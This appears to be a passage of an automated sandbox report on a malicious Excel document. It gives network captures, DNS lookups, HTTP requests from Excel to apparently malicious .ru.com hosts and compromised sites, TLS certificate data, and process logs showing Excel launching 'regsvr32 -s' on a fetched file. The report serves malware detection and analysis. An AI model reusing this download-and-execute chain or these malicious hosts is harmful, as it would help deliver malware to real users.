                                                                                                                                                                            Apr 9, 2021 16:50:34.408443928 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408458948 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408479929 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408480883 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408519030 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408525944 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408556938 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408618927 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408627033 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408655882 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408670902 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408699989 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408718109 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408736944 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408757925 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408777952 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408832073 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408849001 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.408946991 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408986092 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.408989906 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.418193102 CEST49706443192.168.2.5162.251.80.27
                                                                                                                                                                            Apr 9, 2021 16:50:34.568842888 CEST44349706162.251.80.27192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.590106964 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:34.750567913 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.750859022 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:34.751358986 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:34.911560059 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.915158033 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.915210009 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.915242910 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.915350914 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:34.923973083 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:35.104022980 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:35.104186058 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:35.104717016 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:35.305495977 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:35.650815010 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:35.651103020 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:35.651237011 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:35.651632071 CEST49708443192.168.2.567.222.38.97
                                                                                                                                                                            Apr 9, 2021 16:50:35.673151016 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:35.811692953 CEST4434970867.222.38.97192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:35.845802069 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:35.846585035 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:35.847043037 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.019639015 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.019696951 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.019747019 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.019881010 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.019913912 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.019973993 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.020080090 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.020092964 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.020098925 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.020798922 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.020885944 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.056240082 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.229962111 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.230072975 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.230906010 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.444119930 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.500637054 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.500673056 CEST44349710173.201.252.173192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.500819921 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.500885963 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.501151085 CEST49710443192.168.2.5173.201.252.173
                                                                                                                                                                            Apr 9, 2021 16:50:36.673624992 CEST44349710173.201.252.173192.168.2.5

                                                                                                                                                                            UDP Packets

                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                            Apr 9, 2021 16:50:16.130734921 CEST5378453192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:16.143492937 CEST53537848.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:17.079971075 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:17.106506109 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:18.383769035 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:18.402434111 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:19.236852884 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:19.250278950 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:19.898830891 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:19.912182093 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:27.631143093 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:27.644610882 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:28.624866009 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:28.679160118 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:28.994658947 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:29.030096054 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:30.008637905 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:30.023433924 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:31.024178982 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:31.038847923 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:31.219583988 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:31.232595921 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:31.988054037 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:32.275301933 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:32.457319021 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:32.469917059 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:32.705511093 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:33.006109953 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:33.024477959 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:33.039684057 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:33.403589010 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:33.419395924 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:33.419928074 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:33.436000109 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.444114923 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:34.445677996 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:34.460596085 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:34.587918997 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:35.386814117 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:35.399719954 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:35.658883095 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:35.671541929 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:36.463479042 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:36.476281881 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:37.040328979 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:37.080413103 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:37.406884909 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:37.419691086 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:45.245621920 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:45.261970043 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:49.075119972 CEST5973653192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:49.075345993 CEST5105853192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:49.076406002 CEST5263653192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:49.087083101 CEST53510588.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:49.088308096 CEST53597368.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:49.089103937 CEST53526368.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:50.154681921 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:50.167748928 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:51.102541924 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:51.129503012 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:50:53.363485098 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:50:53.376192093 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:51:04.749984026 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:51:04.767606020 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:51:14.443028927 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:51:14.456430912 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:51:30.712889910 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:51:30.727950096 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:51:37.385668039 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:51:37.404068947 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:51:50.858124018 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:51:50.873991013 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:51:52.505423069 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:51:52.518012047 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                                            Apr 9, 2021 16:51:54.115838051 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                                            Apr 9, 2021 16:51:54.144412041 CEST53544508.8.8.8192.168.2.5

                                                                                                                                                                            DNS Queries

                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                            Apr 9, 2021 16:50:31.988054037 CEST192.168.2.58.8.8.80xd9a4Standard query (0)runolfsson-jayde07s.ru.comA (IP address)IN (0x0001)
                                                                                                                                                                            Apr 9, 2021 16:50:32.705511093 CEST192.168.2.58.8.8.80x4dd1Standard query (0)cremin-ian07u.ru.comA (IP address)IN (0x0001)
                                                                                                                                                                            Apr 9, 2021 16:50:33.419395924 CEST192.168.2.58.8.8.80x17f7Standard query (0)shalombaptistchapel.comA (IP address)IN (0x0001)
                                                                                                                                                                            Apr 9, 2021 16:50:34.445677996 CEST192.168.2.58.8.8.80xf943Standard query (0)cesiroinsurance.comA (IP address)IN (0x0001)
                                                                                                                                                                            Apr 9, 2021 16:50:35.658883095 CEST192.168.2.58.8.8.80x8f05Standard query (0)innermetransformation.comA (IP address)IN (0x0001)

                                                                                                                                                                            DNS Answers

                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                            Apr 9, 2021 16:50:32.275301933 CEST8.8.8.8192.168.2.50xd9a4No error (0)runolfsson-jayde07s.ru.com8.211.4.209A (IP address)IN (0x0001)
                                                                                                                                                                            Apr 9, 2021 16:50:33.006109953 CEST8.8.8.8192.168.2.50x4dd1No error (0)cremin-ian07u.ru.com8.211.4.209A (IP address)IN (0x0001)
                                                                                                                                                                            Apr 9, 2021 16:50:33.436000109 CEST8.8.8.8192.168.2.50x17f7No error (0)shalombaptistchapel.com162.251.80.27A (IP address)IN (0x0001)
                                                                                                                                                                            Apr 9, 2021 16:50:34.587918997 CEST8.8.8.8192.168.2.50xf943No error (0)cesiroinsurance.com67.222.38.97A (IP address)IN (0x0001)
                                                                                                                                                                            Apr 9, 2021 16:50:35.671541929 CEST8.8.8.8192.168.2.50x8f05No error (0)innermetransformation.com173.201.252.173A (IP address)IN (0x0001)

                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                            • runolfsson-jayde07s.ru.com
                                                                                                                                                                            • cremin-ian07u.ru.com

                                                                                                                                                                            HTTP Packets

                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            0192.168.2.5497028.211.4.20980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Apr 9, 2021 16:50:32.297149897 CEST1201OUTGET /ind.html HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                            Host: runolfsson-jayde07s.ru.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Apr 9, 2021 16:50:32.695029020 CEST1232INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                            Date: Fri, 09 Apr 2021 14:50:32 GMT
                                                                                                                                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                            X-Powered-By: PHP/5.4.16
                                                                                                                                                                            Content-Length: 76
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                                                                                                                                            Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                            1192.168.2.5497048.211.4.20980C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                                            Apr 9, 2021 16:50:33.029623985 CEST1240OUTGET /ind.html HTTP/1.1
                                                                                                                                                                            Accept: */*
                                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                            Host: cremin-ian07u.ru.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Apr 9, 2021 16:50:33.410718918 CEST1246INHTTP/1.1 503 Service Unavailable
                                                                                                                                                                            Date: Fri, 09 Apr 2021 14:50:33 GMT
                                                                                                                                                                            Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                                                                                                                                                            X-Powered-By: PHP/5.4.16
                                                                                                                                                                            Content-Length: 76
                                                                                                                                                                            Connection: close
                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                            Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e
                                                                                                                                                                            Data Ascii: <h1>Not Found.</h1>The requested URL /ind.html was not found on this server.


                                                                                                                                                                            HTTPS Packets

                                                                                                                                                                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                            Apr 9, 2021 16:50:33.741060972 CEST162.251.80.27443192.168.2.549706CN=autodiscover.shalombaptistchapel.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Feb 13 12:43:03 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri May 14 13:43:03 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                            Apr 9, 2021 16:50:34.915242910 CEST67.222.38.97443192.168.2.549708CN=www.cesiroinsurance.com CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Mon Feb 15 21:11:45 CET 2021 Wed Oct 07 21:21:40 CEST 2020Sun May 16 22:11:45 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021
                                                                                                                                                                            Apr 9, 2021 16:50:36.020798922 CEST173.201.252.173443192.168.2.549710CN=innermetransformation.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 02 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Tue Jun 01 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                                            CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                                            CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                                            Code Manipulations

                                                                                                                                                                            Statistics

                                                                                                                                                                            CPU Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            Memory Usage

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            High Level Behavior Distribution

                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                            Behavior

                                                                                                                                                                            Click to jump to process

                                                                                                                                                                            System Behavior

                                                                                                                                                                            General

                                                                                                                                                                            Start time:16:50:26
                                                                                                                                                                            Start date:09/04/2021
                                                                                                                                                                            Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                            Imagebase:0xf50000
                                                                                                                                                                            File size:27110184 bytes
                                                                                                                                                                            MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:16:50:35
                                                                                                                                                                            Start date:09/04/2021
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:regsvr32 -s ..\ghnrope
                                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:16:50:35
                                                                                                                                                                            Start date:09/04/2021
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:regsvr32 -s
                                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:16:50:36
                                                                                                                                                                            Start date:09/04/2021
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:regsvr32 -s
                                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:16:50:36
                                                                                                                                                                            Start date:09/04/2021
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:regsvr32 -s
                                                                                                                                                                            Imagebase:0x1b0000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            General

                                                                                                                                                                            Start time:16:50:37
                                                                                                                                                                            Start date:09/04/2021
                                                                                                                                                                            Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                            Commandline:regsvr32 -s
                                                                                                                                                                            Imagebase:0x7ff797770000
                                                                                                                                                                            File size:20992 bytes
                                                                                                                                                                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                            Reputation:high

                                                                                                                                                                            Disassembly

                                                                                                                                                                            Code Analysis

                                                                                                                                                                            Reset < >